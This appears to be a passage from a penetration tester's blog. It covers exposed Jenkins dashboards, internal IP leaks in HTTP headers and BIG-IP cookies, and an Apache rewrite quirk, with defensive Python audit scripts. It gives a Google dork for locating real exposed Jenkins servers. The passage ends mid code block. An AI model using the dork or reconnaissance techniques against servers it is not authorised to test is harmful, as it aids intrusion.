<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">SSH Endpoint Disclosure:</span></b><span style="font-size: 11pt; line-height: 115%;"> Jenkins implements an SSH random port feature in
which the software randomizes the port selected for running the SSH service.
Typically, when a client sends a GET request, Jenkins replies with an
"X-SSH-Endpoint" HTTP header which carries the information in the
form host:port. It means the SSH service is listening on the given host with the
given port number. If the system is exposed on the Internet, an
attacker can easily glean the port number on which the SSH server
is listening. A real-world example of a server running Jenkins is shown below:</span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5-6Ie04tMvmueTaJMFTpJ5QA0wFDb_gM60yGjHhzqY2vvmCuqfY3cBLaDFR_jGHnwR4z9hpmTw9UdfcNSAKYLouyCGvJPIJyK3v76Il51dtjy8SZJapxDp2CQmt2u_LDRvFurA/s1600/jenkins_9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5-6Ie04tMvmueTaJMFTpJ5QA0wFDb_gM60yGjHhzqY2vvmCuqfY3cBLaDFR_jGHnwR4z9hpmTw9UdfcNSAKYLouyCGvJPIJyK3v76Il51dtjy8SZJapxDp2CQmt2u_LDRvFurA/s1600/jenkins_9.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>SSH Endpoint Disclosure !</b></td></tr>
</tbody></table>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">The information discussed in this post only provides a glimpse of the
security risks associated with poorly administered software management
applications. These applications can provide plenty of material for attackers
to gain a substantial amount of information about the organization and the server-side
environment, which facilitates additional attacks.</span></div>
<br />
<div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">To replicate the issues, use the
Google dork <b>intitle: "Dashboard [Jenkins]"</b> to get a
list of Jenkins servers available on the Internet. </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt;">Impacts: </span></b><span style="font-size: 11pt;">As shown above, misconfigured software management applications can have
severe impacts, as discussed below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">Information about developers can be used to conduct
phishing attacks, including social engineering trickery, to launch targeted
attacks.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">The common mistake of not enabling CSRF
protection exposes the Jenkins environment to a number of critical web
vulnerabilities such as cross-site file uploading.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">Inappropriate error handling discloses information
about stack traces and the internal components of the software.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">Unrestricted cron jobs will result in successful
runs of different builds of the software. As shown above, information
disclosed in the console output results in leakage of sensitive data such as
secret keys. An attacker can use the secret keys to attack target servers.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">Disclosure of software build information provides an
attacker with complete knowledge of the updates and modifications that have
taken place in the software. This information is useful for hunting
security vulnerabilities or for design analysis.</span></li>
</ul>
<br />
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt;">Recommendations:</span></b></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">For
software development and management interfaces, restrict access completely.
It is highly recommended that the server be configured with complete
authentication, meaning that no functionality of the application should be
accessible without authentication or in a default state.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">Simply
removing the HTTP links from interfaces is not a robust way to restrict access.
The links can be fuzzed easily to gain access to hidden functionality. Deploy
security features using a global configuration.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">Standard
security protection mechanisms should be enabled by default without asking for any
preferences from users or administrators.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">Administrators
should verify new account creation in software like Jenkins before
access is granted to the registered user.</span></li>
</ul>
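<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">The checks behind the recommendations above (full authentication, no anonymous read access, no self sign-up, CSRF protection enabled globally) can be run against a saved copy of the Jenkins <b>config.xml</b> before a server goes live. The script below is an added example written for this post; it is not Jenkins' own code. The element names it reads (useSecurity, authorizationStrategy, denyAnonymousReadAccess, securityRealm/disableSignup, crumbIssuer) follow the layout of Jenkins' config.xml as the author of this example understands it, and the three sample documents are constructed, not captured from any real server: one with security switched off, one with security on but anonymous read and sign-up left open and no CSRF crumb issuer, and one hardened the way the recommendations describe.</span></div>

```python
"""Audit a Jenkins config.xml for the misconfigurations discussed in this post.

Added example, not Jenkins' own code. The element names below follow the
layout of Jenkins' config.xml as the author of this example understands it
(assumption); the sample documents are constructed, not captured.
"""
import xml.etree.ElementTree as ET
from typing import List


def _flag(elem, tag: str) -> bool:
    """True if the child element <tag> of elem reads 'true' (case-insensitive)."""
    if elem is None:
        return False
    return (elem.findtext(tag, default="false") or "").strip().lower() == "true"


def audit_jenkins_config(xml_text: str) -> List[str]:
    """Return one finding per failed check; an empty list means all checks passed."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []

    # 1. Security switched off: users, builds, console output, environment
    #    variables and /script are all reachable without authentication.
    if not _flag(root, "useSecurity"):
        findings.append("useSecurity is false: all interfaces are reachable without authentication")

    # 2. Authorization strategy: 'Unsecured' gives anonymous users full control;
    #    'logged-in users can do anything' still allows anonymous reads unless
    #    denyAnonymousReadAccess is set.
    strategy = root.find("authorizationStrategy")
    strategy_class = strategy.get("class", "") if strategy is not None else ""
    if strategy is None or strategy_class.endswith("$Unsecured"):
        findings.append("authorizationStrategy is Unsecured: anonymous users have full control")
    elif (strategy_class.endswith("FullControlOnceLoggedInAuthorizationStrategy")
          and not _flag(strategy, "denyAnonymousReadAccess")):
        findings.append("anonymous read access allowed: builds, users and console output are exposed")

    # 3. Self sign-up: the /signup and securityRealm/createAccount requests only
    #    succeed while the private realm leaves sign-up enabled.
    realm = root.find("securityRealm")
    if (realm is not None and realm.get("class", "").endswith("HudsonPrivateSecurityRealm")
            and not _flag(realm, "disableSignup")):
        findings.append("disableSignup is false: anyone can create an account")

    # 4. CSRF protection in Jenkins is a crumb issuer; no <crumbIssuer> means it is off.
    if root.find("crumbIssuer") is None:
        findings.append("no crumbIssuer configured: CSRF protection is disabled")

    return findings


# Constructed sample: security disabled entirely.
WEAK_CONFIG = """<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.SecurityRealm$None"/>
</hudson>"""

# Constructed sample: security on, but anonymous read, self sign-up and no CSRF crumb.
PARTIAL_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>false</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
</hudson>"""

# Constructed sample: the state the recommendations ask for.
HARDENED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
  <crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
    <excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
  </crumbIssuer>
</hudson>"""


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("partial", PARTIAL_CONFIG), ("hardened", HARDENED_CONFIG)):
        report = audit_jenkins_config(cfg)
        print(f"{label}: {'OK' if not report else ''}")
        for finding in report:
            print(f"  - {finding}")
```

<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">The audit keeps checking after it finds <b>useSecurity</b> false, so the report lists everything that has to change rather than stopping at the first problem; the hardened sample is the only one that produces no findings.</span></div>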
<br />
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">Configure Well and Be Secure!</span></span></div>
</div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com14tag:blogger.com,1999:blog-30098758.post-49710892129569711962013-08-04T13:47:00.000-07:002013-08-25T14:18:39.465-07:00BlackHat USA Arsenal 2013 : Sparty - A FrontPage and SharePoint Security Auditing Tool<div class="separator" style="clear: both; text-align: center;">
<a href="http://sparty.secniche.org/bh_arsenal.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="158" src="http://sparty.secniche.org/bh_arsenal.png" width="200" /></a></div>
Last week, I released the first version of the Sparty tool at BlackHat USA Arsenal 2013. The tool helps penetration testers check for standard security flaws in deployments of the FrontPage and SharePoint web software. The tool is an outcome of the security issues that have been found in wide deployments of this web software.<br />
<br />
I had an interesting discussion with <a href="https://twitter.com/secbughunter">Tom Gallagher</a> from Microsoft who worked on the FrontPage and SharePoint security and related developments. I got very good feedback which I will incorporate in the next feature. <a href="http://gursevkalra.blogspot.com/">Gursev</a> also provided some impressive points which I will work on.<br />
<br />
Sparty is hosted here : <a href="http://sparty.secniche.org/">http://sparty.secniche.org/</a><br />
<br />
Enjoy and feel free to provide any feedback.<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-59268027011098289652013-07-17T08:03:00.000-07:002013-07-17T08:03:07.543-07:00Internal IP Address Disclosure over HTTP Protocol Channel : Information Revealing Headers !The disclosure of internal IP addresses to remote users reveals a substantial layout of the organizational network. It is highly advised that the web servers should not disclose internal IP addresses in the HTTP response headers. In a real time scenarios, this is not the case. The majority of web servers, load balancing devices and web applications disclose this information. This post simply discusses the different ways through which internal IP addresses are revealed over HTTP protocol.<br />
<br />
You can read more about the HTTP 1.1 specification and how it works here: <a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html">http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html</a><br />
<br />
<b>1. Location Response-Header Field: </b>This response header is used to redirect the HTTP request to a new location. It accompanies a 201 response code when a resource is dynamically created during the request. With the 3xx redirection response codes (301, 302, 303, 304, 305, 306, 307), its value is the location predetermined by the web server as the preferred one.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtA7g7XWDD6LGBV_Y4P74jW8gMbPmXZ7cuwEIfBqU-Z6ZkBiHxPXJ92fxFKYY0NFqUWePvXqikRpSgoCvMgoTmPAO8r1NliYGeMo8LS_BBpQqle78diQRFn7WJ2ZvLBvBOFuI4A/s1600/loc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtA7g7XWDD6LGBV_Y4P74jW8gMbPmXZ7cuwEIfBqU-Z6ZkBiHxPXJ92fxFKYY0NFqUWePvXqikRpSgoCvMgoTmPAO8r1NliYGeMo8LS_BBpQqle78diQRFn7WJ2ZvLBvBOFuI4A/s640/loc.png" width="640" /></a></div>
<br />
<b>2. Content-Location:</b> Similarly, the Content-Location response header also discloses the internal IP address. This header gives the location of the returned resource when it is also accessible at a URI separate from the one requested. There is a known issue in IIS web servers which reveals the internal IP address in the Content-Location header while redirecting the browser. More details can be read here: <a href="http://www.rapid7.com/vulndb/lookup/http-iis-0065">http://www.rapid7.com/vulndb/lookup/http-iis-0065</a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyXYVXlNpoEafPMgNh7NDTnLh16zC3suCPYtvdMhxE8LLlxzkysBfBDW3kUw9nTHHDPXhuSEO0_OgFzy8sUlQfCxRo8CuIDE_1TbMo3Y3mD5wKewUU3H5PUrLVpCoBlVBiAa9X-g/s1600/cl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyXYVXlNpoEafPMgNh7NDTnLh16zC3suCPYtvdMhxE8LLlxzkysBfBDW3kUw9nTHHDPXhuSEO0_OgFzy8sUlQfCxRo8CuIDE_1TbMo3Y3mD5wKewUU3H5PUrLVpCoBlVBiAa9X-g/s640/cl.png" width="640" /></a></div>
<br />
There is a difference in the usage of the Location and Content-Location HTTP response headers. For reference, you can read this blog entry: <a href="http://www.subbu.org/blog/2008/10/location-vs-content-location">http://www.subbu.org/blog/2008/10/location-vs-content-location</a>.<br />
<br />
<b>3. Via Header Field:</b> This HTTP response header is added by gateways and proxies present between the client (user agent, i.e. the browser) and the web server. The basic functions of the Via header field are to track message forwarding, avoid loops during processing and identify protocol capabilities. Generally, this header reveals the internal IP address of the configured gateway or proxy, as shown below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf-7qUO5ZMPR62CskkJuCdN7MHA_VmZL9LPPKjMFjt4oCEEpL8XrjME_CS_voALl8cjJDulbzSt1MGLx7tMhEouzYAKHOqGhC5zNayxtr6X_2kWkC7WHPwiwYaKYK6qMahTy-jNg/s1600/via.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf-7qUO5ZMPR62CskkJuCdN7MHA_VmZL9LPPKjMFjt4oCEEpL8XrjME_CS_voALl8cjJDulbzSt1MGLx7tMhEouzYAKHOqGhC5zNayxtr6X_2kWkC7WHPwiwYaKYK6qMahTy-jNg/s640/via.png" width="640" /></a></div>
<br />
<b>4. X-Cache Header:</b> This response header is emitted by transparent proxies deployed as intermediaries between the client and the server. The idea is to reduce the direct load on the website by keeping a copy in the cache and responding with it when an HTTP request is initiated by the client. Transparent proxies have other functions as well. The internal IP address can be revealed in the two scenarios discussed below:<br />
<br />
<b>4.1 X-Cache Miss: </b>When the transparent proxy does not have a local copy of the website or web pages requested by the client.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZohef8TzBS6r9msVeNaIHSWVmqjd_mYEQF-air_RdSZPLmUOjG-gfU4nYBWi9hYAVTXsVT75Kd2lYwz9Uqz6pla7Z5YmBAxrzMHl3rJY_h3b_XC2Nd_JKf6tpoLAh2oig44jcw/s1600/x_cache_m.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZohef8TzBS6r9msVeNaIHSWVmqjd_mYEQF-air_RdSZPLmUOjG-gfU4nYBWi9hYAVTXsVT75Kd2lYwz9Uqz6pla7Z5YmBAxrzMHl3rJY_h3b_XC2Nd_JKf6tpoLAh2oig44jcw/s640/x_cache_m.png" width="640" /></a></div>
<br />
<b>4.2 X-Cache Hit: </b>When the transparent proxy has a local copy of the website or requested web pages.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlOdLvX7wm8h1rit29a12jASa7KYN9uPaR1lnIn7_ENUYlM2-WNKgH3x7U3yNdDdTDI_wOZmu71LA8WselNfPWvOyF1u2uMfAmuD-dOwAXotw4ZHer0gNIFnWH95T8y1afZUt9g/s1600/x_cache_h.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlOdLvX7wm8h1rit29a12jASa7KYN9uPaR1lnIn7_ENUYlM2-WNKgH3x7U3yNdDdTDI_wOZmu71LA8WselNfPWvOyF1u2uMfAmuD-dOwAXotw4ZHer0gNIFnWH95T8y1afZUt9g/s640/x_cache_h.png" width="640" /></a></div>
<br />
You can read more about the X-Cache headers here: <a href="http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/">http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/</a><br />
<br />
<b>5. Set-Cookie Header:</b> A number of load balancing devices use Set-Cookie to set custom content as part of the communication channel that activates the session with the backend web server. The internal IP address can also be disclosed as part of a Set-Cookie parameter. A simple example is BIG-IP devices, which reveal the internal IP address in binary encoded form. By default, BIG-IP devices handle HTTP connection pooling based on IP addresses. In the screenshot shown below, the pool parameter holds the value of the internal IP address.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIgS8-ZMswfpIFfNQPB-OFSAkcFqlUfRYvKoufOgxJUXwpYiBTrl934vH-mGUOPjUH3bHxOorfN3LQuunWe7w-89JD8Dhm-Wi7cBTD7MG9_A6mOB_LVA0WFwYCO1C_QSxP1_yANA/s1600/big.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIgS8-ZMswfpIFfNQPB-OFSAkcFqlUfRYvKoufOgxJUXwpYiBTrl934vH-mGUOPjUH3bHxOorfN3LQuunWe7w-89JD8Dhm-Wi7cBTD7MG9_A6mOB_LVA0WFwYCO1C_QSxP1_yANA/s640/big.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In my earlier presentations (couple of years ago), I talked about extracting the IP address from the BIG IP http_pool Set-Cookie parameter. The concept is shown below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKEWBclJe2C3mdQ7pcbRwyWCIdMCkWgCLrRkJc3HX1zTckIL8ZUuYfix3XAc45L7b1SSY2nl_CymdgIEBPGAVuYzMMZccmmMbCsymsOztYeojxp5KMLpgWSDeGJapewQAWCFPQQ/s1600/bipip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKEWBclJe2C3mdQ7pcbRwyWCIdMCkWgCLrRkJc3HX1zTckIL8ZUuYfix3XAc45L7b1SSY2nl_CymdgIEBPGAVuYzMMZccmmMbCsymsOztYeojxp5KMLpgWSDeGJapewQAWCFPQQ/s640/bipip.png" width="640" /></a></div>
<br />
<br />
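As an added example (not the author's code), the following Python check scans a captured HTTP response for the header patterns discussed in sections 1 to 5 and decodes the BIG-IP persistence cookie the way the slide above describes. The sample response is constructed; the cookie layout assumed (IPv4 as a little-endian 32-bit integer, port as a byte-swapped 16-bit integer) is the standard BIG-IP cookie-persistence format.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Address ranges that have no business appearing in a response sent to the public Internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Headers covered in this post, plus X-Cache-Lookup, which caching proxies emit beside X-Cache.
WATCHED_HEADERS = ("location", "content-location", "via", "x-cache", "x-cache-lookup", "set-cookie")

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# BIG-IP persistence cookie: BIGipServer<pool>=<ipv4 as little-endian u32>.<port byte-swapped u16>.0000
BIGIP_RE = re.compile(r"(BIGipServer[^=;\s]*)=(\d+)\.(\d+)\.\d+")


def is_internal(ip_text: str) -> bool:
    """True for RFC 1918, loopback and link-local IPv4 addresses."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def decode_bigip_cookie(cookie_value: str) -> Optional[Tuple[str, int]]:
    """Recover the pool member (ip, port) behind a BIG-IP persistence cookie value."""
    m = BIGIP_RE.search(cookie_value)
    if m is None:
        return None
    try:
        ip_bytes = int(m.group(2)).to_bytes(4, "little")     # 1677787402 -> 0a 01 01 64
        port_bytes = int(m.group(3)).to_bytes(2, "little")   # 36895 -> 1f 90
    except OverflowError:                                    # not a well-formed cookie
        return None
    ip = ".".join(str(b) for b in ip_bytes)                  # "10.1.1.100"
    port = int.from_bytes(port_bytes, "big")                 # 0x1f90 -> 8080
    return ip, port


def parse_headers(raw_response: str) -> List[Tuple[str, str]]:
    """Split the header block of a raw HTTP response into lower-cased (name, value) pairs."""
    pairs = []
    for line in raw_response.replace("\r\n", "\n").split("\n")[1:]:  # [0] is the status line
        if not line.strip():
            break                                                     # end of the header block
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def find_disclosures(raw_response: str) -> List[str]:
    """One finding per watched header that exposes an internal IPv4 address, plain or encoded."""
    findings = []
    for name, value in parse_headers(raw_response):
        if name not in WATCHED_HEADERS:
            continue
        for ip in IPV4_RE.findall(value):
            if is_internal(ip):
                findings.append(f"{name}: internal address {ip} in clear text")
        if name == "set-cookie":
            decoded = decode_bigip_cookie(value)
            if decoded is not None and is_internal(decoded[0]):
                findings.append(f"{name}: BIG-IP persistence cookie decodes to {decoded[0]}:{decoded[1]}")
    return findings


# Constructed sample response (not a real capture) that exercises every header type above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: http://10.0.0.15/app/login\r\n"
    "Content-Location: http://192.168.1.20/app/\r\n"
    "Via: 1.1 172.16.4.9 (squid/3.1)\r\n"
    "X-Cache: MISS from 192.168.5.5\r\n"
    "Set-Cookie: BIGipServerpool_web=1677787402.36895.0000; path=/\r\n"
    "Server: Apache\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for finding in find_disclosures(SAMPLE_RESPONSE):
        print(finding)
```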
These are some of the HTTP headers over which internal IP addresses are exposed. During deployment, one should verify and validate that these headers do not expose unnecessary information.<br />
<br />
Note: If anyone has additional information regarding Internal IP address disclosure over HTTP channel, let me know and I will update this entry. The idea is to collect all the metrics.<br />
<br />
Enjoy!<br />
<b>Contrarisk Security Podcast Series: A Talk on Socioware!</b> (2013-05-20)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://theplayvault.com/wp/wp-content/uploads/2011/06/podcast1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://theplayvault.com/wp/wp-content/uploads/2011/06/podcast1.png" width="200" /></a></div>
<br />
I recently did a podcast on Socioware with Steve from Contrarisk.<br />
<br />
"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."<br />
<br />
Listen to the podcast here: <a href="http://contrarisk.com/2013/05/19/csp-0011/"><b>http://contrarisk.com/2013/05/19/csp-0011/</b></a><br />
<b>ToorCon 14 (2012) : Malandroid - The Crux of Android Infections</b> (2013-05-04)<br />
Talk that I gave on Android malware at ToorCon 14.<br />
<br />
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/NrIA4V7U1aI" width="420"></iframe></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/t-AVgW0K4tQ" width="420"></iframe></div>
<div style="text-align: center;">
<br /></div>
<b>(Pentest Apache #3) - The Nature of # (%23) Character | Mod Security Rules in Apache</b> (2013-04-27)<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In my earlier posts, I have talked about some interesting issues in deployed modules in Apache and insecure configuration. Refer here:<br />
<br />
<b>1. <a href="http://zeroknock.blogspot.com/2012/10/exposed-apache-axis-soap-objects.html">(Pentest Apache #1) Exposed Apache Axis - SOAP Objects</a></b><br />
<b>2. <a href="http://zeroknock.blogspot.com/2013/01/pentest-apache-2-beauty-of-3f-and.html">(Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security</a></b><br />
<br />
In this post, I want to discuss an interesting issue that occurs due to misconfigured rules in modsecurity. It is not a severe issue, but it helps the penetration tester gain some additional information about the server-side environment, for example a directory listing.<br />
<br />
NE stands for No Escape. One can explicitly configure a rewrite rule with this flag to suppress escaping. For example, <b>"#"</b> will be converted to <b>"%23"</b> if the NE flag is not set. If the NE flag is set, the <b>"#"</b> character is treated as such and processed accordingly. For more about the rewrite flags, refer here: <a href="http://httpd.apache.org/docs/2.2/rewrite/flags.html"><b>http://httpd.apache.org/docs/2.2/rewrite/flags.html</b></a>. An example taken from there:<br />
<br />
<br />
<i><b>"RewriteRule ^/anchor/(.+) /bigpage.html#$1 [NE,R]. </b><b>This example will redirect /anchor/xyz to /bigpage.html#xyz."</b></i><br />
<br />
If escaping is not set properly, in addition to some misconfiguration issue, it could result in unexpected behavior. I have noticed this flaw a plethora of times during a number of security assessments. Let's have a look at a real-world example:<br />
<br />
<br />
URL pattern 1: <b>http://www.example.com/temp/#htaccess.cl</b><br />
URL pattern 2: <b>http://www.example.com/temp/%23htaccess.cl</b><br />
<b><br /></b>
In case (1), if the NE flag is set, the URL has to be processed with the <b>"#"</b> character. In case (2), if the NE flag is not set, the URL has to be processed with <b>"%23"</b>, the hexadecimal notation of the character <b>"#"</b>. But due to misconfiguration, the behavior changes.<br />
<br />
The tested server is <b>Apache/2.2.14</b>. Both URLs were answered with 200 OK responses. In case (1), the output is a directory listing. In case (2), the output is the content of the file htaccess.cl.<br />
<br />
<b>Case 1: Content-Type is text/html;charset=UTF-8</b><br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQX_KjkJJEz5PHI4t4QOABuO6pNRd_m5_c-aUlwifRmU3DTiZUtkVpzcofupq24XC60DzLh3RYNdlfLt2bD6fygKC9E0vI_kSrFst3nqvJaA_WZ9TwZUTMqkOaRBarnSi5oYfAsw/s1600/mod_security_case_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQX_KjkJJEz5PHI4t4QOABuO6pNRd_m5_c-aUlwifRmU3DTiZUtkVpzcofupq24XC60DzLh3RYNdlfLt2bD6fygKC9E0vI_kSrFst3nqvJaA_WZ9TwZUTMqkOaRBarnSi5oYfAsw/s400/mod_security_case_1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>With # Character </b></td></tr>
</tbody></table>
<b>Case 2: Content-Type is text/plain</b><br />
<div>
<b><br /></b>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJwT8QfQURhHCzI5uqW1C03nfzO-9NmUyM6cIuwzXiS8CkmGOHYLIXqYX8woUTFgEYvCbfrNTfHUoqb5ZH-mdqn5tpPjeMRWsZgWvIXq5kQam8nNmLtnR7UXBXo0oXKu8sRXaSg/s1600/mod_security_case_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJwT8QfQURhHCzI5uqW1C03nfzO-9NmUyM6cIuwzXiS8CkmGOHYLIXqYX8woUTFgEYvCbfrNTfHUoqb5ZH-mdqn5tpPjeMRWsZgWvIXq5kQam8nNmLtnR7UXBXo0oXKu8sRXaSg/s400/mod_security_case_2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br />
<b>With %23 Character</b></td></tr>
</tbody></table>
<br />
One reason could be that the file name starts with the "#" character. But the primary reason is the inability of Apache to handle misconfigured URL rewriting rules. Usually, if a URL rewriting rule fails, the web server should respond with a 404 error message. In the case of misconfiguration, the fallback step is the directory listing, at least that is what I have seen in practical scenarios (it could be different).<br />
<br />
<b>Inference: </b>Play around with URL rewriting rules to detect bypasses which could result in gleaning additional information.<br />
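Added example (not from the post): this Python snippet models the two URL patterns above, showing what the browser actually puts in the request line for each, what Apache maps to the filesystem after percent-decoding, and the Location value a redirect rule like the one quoted from the Apache documentation emits with and without NE. The escaping model is deliberately simplified to the '#' character that this post is about.

```python
from urllib.parse import quote, unquote, urlsplit


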